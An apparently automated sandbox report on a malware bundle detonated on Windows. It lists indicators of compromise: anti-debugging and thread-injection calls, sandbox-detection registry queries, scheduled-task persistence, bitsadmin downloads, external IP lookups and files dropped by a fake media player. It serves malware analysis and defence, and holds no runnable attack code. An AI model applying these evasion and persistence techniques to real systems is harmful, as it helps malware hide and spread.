\??\E: setting.exe File opened (read-only) \??\O: setting.exe File opened (read-only) \??\W: setting.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\B: setting.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 14 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 51 ipinfo.io 193 ipinfo.io 195 ipinfo.io 198 ipinfo.io 249 ipinfo.io 389 ipinfo.io 2 ip-api.com 50 ipinfo.io 53 ipinfo.io 273 ipinfo.io 390 ip-api.com 410 ipinfo.io 510 ipinfo.io 286 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 28 IoCs
Processes:
rzFPMen3odIYaTyH172kj3IK.exeConhost.exemUWMZpz81mXRuU24Z6aKAGGB.exe427k7GX7zKXCwdsG204Llusg.exe4ujWsOfWNHyu9F9f_UNQytd8.exeoiDNgvkGRj0prd4u1AFHb_VU.exedkXwYYim4MBaHXEPgI2496RO.exe2626800.exe2775016.exe4044792.exe6431454.exe4252378.exe62FA.exe30.10.21_.exe2957429.exepid process 1200 rzFPMen3odIYaTyH172kj3IK.exe 5756 Conhost.exe 5536 mUWMZpz81mXRuU24Z6aKAGGB.exe 6128 427k7GX7zKXCwdsG204Llusg.exe 5616 4ujWsOfWNHyu9F9f_UNQytd8.exe 4208 oiDNgvkGRj0prd4u1AFHb_VU.exe 5508 dkXwYYim4MBaHXEPgI2496RO.exe 5508 dkXwYYim4MBaHXEPgI2496RO.exe 5508 dkXwYYim4MBaHXEPgI2496RO.exe 5508 dkXwYYim4MBaHXEPgI2496RO.exe 5508 dkXwYYim4MBaHXEPgI2496RO.exe 5508 dkXwYYim4MBaHXEPgI2496RO.exe 5508 dkXwYYim4MBaHXEPgI2496RO.exe 5508 dkXwYYim4MBaHXEPgI2496RO.exe 5508 dkXwYYim4MBaHXEPgI2496RO.exe 5508 dkXwYYim4MBaHXEPgI2496RO.exe 5508 dkXwYYim4MBaHXEPgI2496RO.exe 5508 dkXwYYim4MBaHXEPgI2496RO.exe 5508 dkXwYYim4MBaHXEPgI2496RO.exe 5508 dkXwYYim4MBaHXEPgI2496RO.exe 7036 2626800.exe 5956 2775016.exe 3464 4044792.exe 5244 6431454.exe 3664 4252378.exe 8892 62FA.exe 17448 30.10.21_.exe 1280 2957429.exe -
Suspicious use of SetThreadContext 13 IoCs
Processes:
mshta.exeCHjg5Y_u54NbfvxUap_GN9hB.exe13bpu9cGZVQ3bQBYByHDZulD.exekl8sNYvH953ODyX689F8z9zN.exedkXwYYim4MBaHXEPgI2496RO.exeTMnzDfTlwNkK30H06E1jeF_8.exewscript.execonhost.exe1067.exeC669.exeevil_00000461748.exeLeverages.exedescription pid process target process PID 4384 set thread context of 3060 4384 mshta.exe Sat01d42d6cf82db.exe PID 3152 set thread context of 3196 3152 CHjg5Y_u54NbfvxUap_GN9hB.exe Explorer.EXE PID 4200 set thread context of 3196 4200 13bpu9cGZVQ3bQBYByHDZulD.exe Explorer.EXE PID 3288 set thread context of 6480 3288 kl8sNYvH953ODyX689F8z9zN.exe AppLaunch.exe PID 5508 set thread context of 3376 5508 dkXwYYim4MBaHXEPgI2496RO.exe dkXwYYim4MBaHXEPgI2496RO.exe PID 4520 set thread context of 5144 4520 TMnzDfTlwNkK30H06E1jeF_8.exe 3092977.exe PID 6832 set thread context of 3196 6832 wscript.exe Explorer.EXE PID 1060 set thread context of 6496 1060 conhost.exe explorer.exe PID 5964 set thread context of 5476 5964 1067.exe 1067.exe PID 6832 set thread context of 6496 6832 wscript.exe explorer.exe PID 11364 set thread context of 16116 11364 C669.exe C669.exe PID 16964 set thread context of 17916 16964 evil_00000461748.exe AppLaunch.exe PID 16972 set thread context of 18200 16972 Leverages.exe Leverages.exe -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exeautosubplayer.exeautosubplayer.exeautosubplayer.exeSat018ad0a25a7faa.tmpShareFolder.exedescription ioc process File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libsmf_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_streams.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\vlm.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libvcd_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libflacsys_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsfsstorage_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Sat018ad0a25a7faa.tmp File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png autosubplayer.exe File created C:\Program Files\Uninstall Information\VHDYQFXRKD\foldershare.exe ShareFolder.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\appletrailers.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libau_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libasf_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_dummy_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\jamendo.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_dummy_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libpva_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\favicon.ico autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\meta\art\02_frenchtv.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\modules\common.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\misc\libvod_rtsp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\vlm.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\soundcloud.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\mobile.css autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\meta\reader\filename.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\liveleak.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libpva_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\spu\librss_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\spu\librss_plugin.dll autosubplayer.exe -
Drops file in Windows directory 31 IoCs
Processes:
svchost.exemsiexec.exeWerFault.exeTiWorker.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\Installer\MSI2983.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF6EF6615987DE5576.TMP msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\MSI9B67.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1199.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI521.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4A1D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6036.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF4918BCBE5FCB252A.TMP msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\Installer\f78730f.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\WinSxS\pending.xml TiWorker.exe File opened for modification C:\Windows\Installer\MSIE850.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3B66.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6DF4.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF4BC197CC1D20EA8C.TMP msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\Installer\MSI6DB4.tmp msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File created C:\Windows\Installer\f78730f.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI10CA.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIF263.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DFAB41E1CA6FAF8376.TMP msiexec.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 31 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2080 1596 WerFault.exe Sat01e3b3e0fa80800c.exe 6272 5012 WerFault.exe Sat01866e4ba0024d.exe 6808 2188 WerFault.exe Sat01c0e0d4fbb2ea73.exe 6996 588 WerFault.exe Sat0119f3e03c741b02f.exe 6112 3288 WerFault.exe kl8sNYvH953ODyX689F8z9zN.exe 5492 3812 WerFault.exe 6.exe 6428 6816 WerFault.exe LzmwAqmV.exe 5316 2516 WerFault.exe DPf8n8re0wSS4BsJopFZX_fw.exe 4868 1636 WerFault.exe 0aGYt0jDJJ7fYapPkZzf1Us9.exe 6284 6816 WerFault.exe LzmwAqmV.exe 5256 5856 WerFault.exe setup.exe 6976 5044 WerFault.exe build.exe 6968 2196 WerFault.exe tQHJh4kJi8M3Hs2e9XPGcZue.exe 6184 960 WerFault.exe VSEpxIrnTzVwh6FUu92XjrEG.exe 400 4936 WerFault.exe D18fZksnEpyQMkyslyXdHEnd.exe 3496 1488 WerFault.exe Gcgaq2iYSkgHI5IxJUco2ilG.exe 6964 5712 WerFault.exe 1CAHrufhJbYSm8quK5_Pt3Hd.exe 3192 4808 WerFault.exe 875E.exe 13888 9100 WerFault.exe gcleaner.exe 14288 9684 WerFault.exe GcleanerEU.exe 14920 10716 WerFault.exe GcleanerEU.exe 15756 9996 WerFault.exe 86BF.exe 17180 12520 WerFault.exe gcleaner.exe 17416 13316 WerFault.exe GcleanerEU.exe 17548 13492 WerFault.exe GcleanerEU.exe 18700 16964 WerFault.exe evil_00000461748.exe 6072 15060 WerFault.exe gcleaner.exe 7176 15696 WerFault.exe gcleaner.exe 8196 15484 WerFault.exe 7FAA.exe 8628 17540 WerFault.exe 154de2777e56314fc82ddac571ee3af0309b601a_2021-10-30_13-10.exe 9408 15968 WerFault.exe 948C.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
3092977.exe1067.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3092977.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3092977.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3092977.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1067.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1067.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1067.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeCalculator.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exesvchost.exeWerFault.exeShareFolder.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 ShareFolder.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 7084 schtasks.exe 3388 schtasks.exe 4084 schtasks.exe 3892 schtasks.exe 4740 schtasks.exe -
Download via BitsAdmin 1 TTPs 4 IoCs
Processes:
bitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exepid process 9572 bitsadmin.exe 10816 bitsadmin.exe 17560 bitsadmin.exe 11008 bitsadmin.exe -
Enumerates system info in registry 2 TTPs 63 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeCalculator.exeWerFault.exeWerFault.exeWerFault.exeShareFolder.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU ShareFolder.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS ShareFolder.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Calculator.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 